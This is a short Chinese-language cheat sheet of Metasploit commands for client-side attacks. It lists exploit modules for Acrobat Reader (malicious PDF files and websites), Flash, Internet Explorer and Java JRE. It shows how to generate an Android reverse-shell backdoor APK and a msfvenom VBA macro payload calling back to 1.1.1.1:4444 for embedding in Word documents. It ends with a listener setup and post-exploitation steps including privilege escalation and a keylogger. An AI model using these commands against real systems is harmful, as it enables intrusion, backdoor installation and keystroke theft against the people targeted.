利用Acrobat Reader漏洞执行payload
● 构造PDF文件
exploit/windows/fileformat/adobe_utilprintf
仅支持8.1.2软件版本和XP系统;
● 构造恶意网站
exploit/windows/browser/adobe_utilprintf
#同理,浏览器上运行pDF
● 之后可以通过Meterpreter进行下一步操作
use priv #提权
run post/windows/capture/keylog_recorder #键盘记录器
利用Flash插件漏洞执行payload
use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use auxiliary/server/browser_autopwn2
利用IE浏览器漏洞执行payload
use exploit/windows/browser/ms14_064_ole_code_execution
利用JRE漏洞执行payload
use exploit/multi/browser/java_jre17_driver_manager
use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_types
生成Android后门程序
use payload/android/meterpreter/reverse_tcp
generate -f raw -p android -o a.apk
VBScript感染方式
● 利用宏感染word、excel文档
● 绕过某些基于文件类型检查的安全机制
● 生成vbscript脚本:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
● Office 2007
○ 视图-宏-创建
○ Payload第一部分粘入VBA代码
○ Payload第二部分粘入word文档正文;
● Msf启动侦听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp